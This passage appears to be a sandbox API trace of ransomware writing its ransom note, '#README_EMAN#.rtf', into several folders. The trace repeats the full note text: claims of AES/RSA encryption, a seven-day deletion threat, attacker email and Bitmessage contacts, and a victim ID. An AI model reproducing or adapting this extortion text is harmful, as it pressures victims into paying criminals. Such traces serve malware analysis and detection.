g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.046] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.047] CloseHandle (hObject=0x294) returned 1 [0285.047] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\#readme_eman#.rtf")) returned 0xffffffff [0285.047] GetLastError () returned 0x2 [0285.047] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.048] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.048] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 